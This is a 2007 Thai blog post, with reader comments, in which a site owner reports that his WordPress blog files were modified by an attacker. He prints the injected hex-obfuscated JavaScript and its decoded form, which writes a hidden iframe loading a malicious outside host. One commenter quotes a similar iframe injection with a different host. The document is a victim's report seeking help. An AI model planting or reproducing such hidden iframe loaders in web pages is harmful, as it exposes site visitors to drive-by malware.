Thaibuycar.com

ai siktir vee What do you want? Fuck

Posted by Gootum on Monday, October 29th 2007   

Digg it

Bookmark it

Stumble it

Email to friend

29
Oct

วันนี้อัพเดดรูปมิตติ้งสามประตูแต่พอไปดู validate แล้วดันไม่ผ่าน code มันแปลกๆเลย view code ดูก็เลยเห็นของดีที่ไอ้เลวมันเอามาใส่เว็บส้งติงของใครก็ไม่รู้สคริปที่เขียนก็กระจอก ถอดรหัสได้ว่า

document.write(’<iframe name=4102e551bb src=’
http://stock-stats.info/private_forum/index.php?
‘+Math.round(Math.random()*54905)+’4d51752b’”>’);

stock-stats.info/private_forum/index.php แล้วพอเปิดเข้าไปมันก็บอกว่า ai siktir vee? แปลว่าไรก็ไม่รู้ภาษารัสเซียมั้งครับ ใครรู้ช่วยบอกหน่อยครับว่าแปลว่าไรพอดีเปิดเข้าไปมันบอกว่าแบบนี้น่าจะมีความหมายเดียวกะ Fuck off! มั้งครับพอดีเพื่อนของเพื่อนเค้าแปลให้อิอิ เข้าไปโดนมันหลอกด่าอีกเวงจริงๆ ตอนนี้ก็ไม่รู้มันเข้ามาทางไหนแต่ที่รู้ๆมันไปแก้ไฟล์ /blog/htdocs/wp-content/index.php สคริปที่เอาไปใส่ก็ประมาณนี้ครับ

<script>function v47239c3cdb7ca(v47239c3cdbf95){
 var v47239c3cdc764=16; return(parseInt(v4723
?9c3cdbf95,v47239c3cdc764));}function v47239c3
cdd703(v47239c3cdded4){? var v47239c3cde6a1
?=”;for(v47239c3cdee76=0; v47239c3cdee76<v4
7239c3cdded4.length; v47239c3cdee76+=2){ v4
?7239c3cde6a1+=(String.fromCharCode(v47239c3
cdb7ca(v47239c3cdded4.substr(v47239c3cdee76?,
2))));}returnv47239c3cde6a1;}document.write
(v47239c3cdd703(’3C5343524950543E77696E646F772
E7374617475733D27446F6E65273B646F63756D65
6E742E777269746528273C696672616D65206E6
16D653D37613061626430306164207372633D5C27
687474703A2F2F73746F636B2D73746174732E69
6E666F2F707269766174655F666F72756D2F696E646
5782E7068703F272B4D6174682E726F756E64
284D6174682E72616E646F6D28292A363531353129
2B27303035396462665C272077696474683D353
133206865696768743D313237207374796C653D5C2
7646973706C61793A206E6F6E655C273E3C2F6
96672616D653E27293C2F5343524950543E’));
</script>3738207374796C653D5C27646973706C617
93A206E6F6E655C273E3C2F696672616D653E2729
3C2F5343524950543E’));</script>

ผมไม่รู้ว่าเข้ามาทางไหนดูที่ server ก็ปกติดูที่ ftp ก็เปงไฟล์ปกติ ดูที่ blog ก็ไม่สามารถแก้ไขไฟล์ผ่าน blog ได้แล้วมันมาจากไหนเข้าไปแก้ไขไฟล์ได้ยังไงใครรู้มาบอกหน่อยครับ แต่ยังไงก็เอาคืนไปแล้วล่ะพรุ่งนี้มันคงมาเอาคืนผมชุดใหญ่แน่เลยอิอิไอ้เว็บนี้ stock-stats.info มันเอาไว้ทำไรว่ะนี่ต้องการทราฟฟิกก็ไม่บอกกันดีๆมาแอบเอา code มาใส่เว็บผมซ่ะงั้นไอ้บ้าเอ้ย นั่งแก้ตั้งนานมันก็ยังไม่หายไล่ดูอีกที่มีอีกไฟล์ /blog/htdocs/index.php งานนี้มันไม่ธรรมดาแล้วล่ะน่าจะมีสคริป php ที่ shell เข้ามาแน่เลย หาก่อนพี่น้องไม่เจอซักทีคราวหน้ามันเล่นผมหนักแน่เลย….

ai siktir vee : What do you want? Fuck

Popularity: 4% [?]

Social Bookmark Blog : These icons link to social bookmarking sites where readers can share and discover new web pages.
  • bodytext
  • del.icio.us
  • StumbleUpon
  • BlinkList
  • Furl
  • Reddit
  • Technorati
  • Fleck
  • YahooMyWeb
  • Netscape
  • Netvouz
  • description
  • ThisNext
  • MisterWong
  • Wists
Blog Related Content

  • No related posts

    Subscribe to the post comments feeds or Leave a trackback

    Filed under: hack-crack Blog     Tags: ,
       

    6 Comments Already

    commenter
    นายนู๋ Said,
    October 31st, 2007 @1:44 am  

    เราโดนเหมือนกันตั้ม มันเข้าทาง server
    เคยดู log มันมาทาง pro_ftpd กับ vs_ftpd ตอนนี้ก็แก้ไขไม่ได้เลย
    มาบ่อยมากๆ พอมาที ก็ต้องลบที บางวันโดนเป็น 100 เว็บก็แก้ตายเลย

    ตอนนี้วิธีแก้ขัดที่เราใช้ ก็คือ
    เข้า root ssh แล้วใช้ permission chmod 644 ไฟล์เว็บที่โดนทั้งอัพโหลด และแก้ไขไฟล์
    เคยลอง 644 ของ ftp user มันก็มาเขียนทับได้อีก เลยล่อ root เลย มันก็เข้ามานะ แต่เปิดไฟล์เขียนทับไม่ได้
    ข้อเสีย ลูกค้าเข้าแบบ ftp user จะอัพเดทแก้ไฟล์ไม่ได้ เราต้องมา reset owner ให้เป็น owner group ที่ล่ะรายๆไป

    ใครรู้วิธีแก้ไข บอกด้วย

    commenter
    Gootum Said,
    October 31st, 2007 @9:24 am  

    ตอนนี้ตั้มกันได้ล่ะ แต่รอดูก่อนซักระยะนึงว่าจะเข้ามาได้อีกเปล่า ของพี่นู๋เป็น blog รึว่าอะไรเหรอ ใช้ wordpress เปล่าของรายละเอียดเว็บที่โดนหน่อย
    ส่วนของตั้มหน่ะแก้ไขไปหลายอย่างล่ะ แต่ไม่รู้มันจะเข้ามาได้อีกอ่ะเปล่ารอดูอีกรอบครับ

    commenter
    kent_CM Said,
    December 15th, 2007 @11:30 pm  

    สงสัยจาโดน Xss

    commenter
    Ilia Said,
    December 28th, 2007 @2:50 am  

    Hi! found this page typed in google ‘ai siktir vee?’

    same problem, occured 25 dec 2007:
    =============
    window.status=’Done’;document.write(”)
    =============

    All index.* files on my site were mysteriously modified.

    commenter
    Ilia Said,
    December 28th, 2007 @2:53 am  

    uhhhhh…

    document.write(’<iframe name=c9919e86b659 src=’http://spl.vip-ddos.org/index.php?’+Math.round(Math.random()*9864)+’1a34b75a8c’ ‘>’)

    Anonymous Said,
    January 8th, 2008 @4:42 am  

    D? sz?p b?t?k! Milyen nyelven ?rtok ti?

    Related Post

    Please Leave Your Comments Below

    Please Note: All comments will be moderated

    « งาน Meeting Honda Civic EG3D Club
    เหงา เบื่อ โดดเดี่ยว »